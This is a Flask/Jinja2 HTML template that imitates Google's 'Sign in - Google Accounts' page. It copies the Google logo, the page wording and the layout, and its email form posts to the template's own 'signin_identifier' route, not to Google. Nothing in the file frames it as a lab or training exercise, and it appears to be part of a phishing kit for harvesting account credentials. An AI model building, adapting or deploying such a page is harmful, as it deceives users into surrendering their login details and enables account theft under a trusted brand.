<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Sign in - Google Accounts</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css
" rel="stylesheet">
    <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css
" rel="stylesheet">
    <link href="{{ url_for('static', filename='style.css') }}" rel="stylesheet">
</head>
<body>
    <div class="container-fluid min-vh-100 d-flex align-items-center justify-content-center">
        <div class="row w-100 justify-content-center">
            <div class="col-12 col-sm-8 col-md-6 col-lg-4">
                <div class="card border-0 shadow-sm">
                    <div class="card-body p-4 p-md-5">
                        <!-- Google Logo -->
                        <div class="text-center mb-4">
                            <svg width="75" height="24" viewBox="0 0 272 92" fill="none" xmlns="http://www.w3.org/2000/svg
">
                                <path d="M115.75 47.18c0 12.77-9.99 22.18-22.25 22.18s-22.25-9.41-22.25-22.18C71.25 34.32 81.24 25 93.5 25s22.25 9.32 22.25 22.18zm-9.74 0c0-7.98-5.79-13.44-12.51-13.44S80.99 39.2 80.99 47.18c0 7.9 5.79 13.44 12.51 13.44s12.51-5.55 12.51-13.44z" fill="#EA4335"/>
                                <path d="M163.75 47.18c0 12.77-9.99 22.18-22.25 22.18s-22.25-9.41-22.25-22.18c0-12.85 9.99-22.18 22.25-22.18s22.25 9.32 22.25 22.18zm-9.74 0c0-7.98-5.79-13.44-12.51-13.44s-12.51 5.46-12.51 13.44c0 7.9 5.79 13.44 12.51 13.44s12.51-5.55 12.51-13.44z" fill="#FBBC05"/>
                                <path d="M209.75 26.34v39.82c0 16.38-9.66 23.07-21.08 23.07-10.75 0-17.22-7.19-19.66-13.07l8.48-3.53c1.51 3.61 5.21 7.87 11.17 7.87 7.31 0 11.84-4.51 11.84-13v-3.19h-.34c-2.18 2.69-6.38 5.04-11.68 5.04-11.09 0-21.25-9.66-21.25-22.09 0-12.52 10.16-22.26 21.25-22.26 5.29 0 9.49 2.35 11.68 4.96h.34v-3.61h9.25zm-8.56 20.92c0-7.81-5.21-13.52-11.84-13.52-6.72 0-12.35 5.71-12.35 13.52 0 7.73 5.63 13.36 12.35 13.36 6.63 0 11.84-5.63 11.84-13.36z" fill="#34A853"/>
                                <path d="M225 3v65h-9.5V3h9.5z" fill="#EA4335"/>
                                <path d="M262.02 54.48l7.56 5.04c-2.44 3.61-8.32 9.83-18.48 9.83-12.6 0-22.01-9.74-22.01-22.18 0-13.19 9.49-22.18 20.92-22.18 11.51 0 17.14 9.16 18.98 14.11l1.01 2.52-29.65 12.28c2.27 4.45 5.8 6.72 10.75 6.72 4.96 0 8.4-2.44 10.92-6.14zm-23.27-7.98l19.82-8.23c-1.09-2.77-4.37-4.7-8.23-4.7-4.95 0-11.84 4.37-11.59 12.93z" fill="#FBBC05"/>
                            </svg>
                        </div>

                        <!-- Sign in header -->
                        <div class="text-center mb-4">
                            <h1 class="h4 mb-2">Sign in</h1>
                            <p class="text-muted">to continue to your Google Account</p>
                        </div>

                        <!-- Flash messages -->
                        {% with messages = get_flashed_messages(with_categories=true) %}
                            {% if messages %}
                                {% for category, message in messages %}
                                    <div class="alert alert-danger alert-dismissible fade show" role="alert">
                                        <i class="fas fa-exclamation-triangle me-2"></i>
                                        {{ message }}
                                        <button type="button" class="btn-close" data-bs-dismiss="alert"></button>
                                    </div>
                                {% endfor %}
                            {% endif %}
                        {% endwith %}

                        <!-- Email form -->
                        <form action="{{ url_for('signin_identifier') }}" method="POST">
                            <div class="mb-3">
                                <input type="email" 
                                       class="form-control form-control-lg google-input" 
                                       name="email" 
                                       id="email" 
                                       placeholder="Email or phone"
                                       required>
                                <label for="email" class="google-label">Email or phone</label>
                            </div>

                            <div class="mb-3">
                                <a href="{{ url_for('forgot_password') }}" class="text-decoration-none google-link">
                                    Forgot email?
                                </a>
                            </div>

                            <div class="mb-4">
                                <p class="small text-muted">
                                    Not your computer? Use Guest mode to sign in privately.
                                    <a href="#" class="text-decoration-none google-link">Learn more</a>
                                </p>
                            </div>

                            <div class="d-flex justify-content-between align-items-center">
                                <a href="#" class="btn btn-outline-primary google-btn-outline">
                                    Create account
                                </a>
                                <button type="submit" class="btn btn-primary google-btn-primary">
                                    Next
                                </button>
                            </div>
                        </form>
                    </div>
                </div>

                <!-- Footer -->
                <div class="row mt-4">
                    <div class="col-6">
                        <select class="form-select form-select-sm border-0">
                            <option>English (United States)</option>
                        </select>
                    </div>
                    <div class="col-6 text-end">
                        <div class="small">
                            <a href="#" class="text-muted text-decoration-none me-3">Help</a>
                            <a href="#" class="text-muted text-decoration-none me-3">Privacy</a>
                            <a href="#" class="text-muted text-decoration-none">Terms</a>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>

    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/js/bootstrap.bundle.min.js
"></script>
    <script src="{{ url_for('static', filename='script.js') }}"></script>
</body>
</html>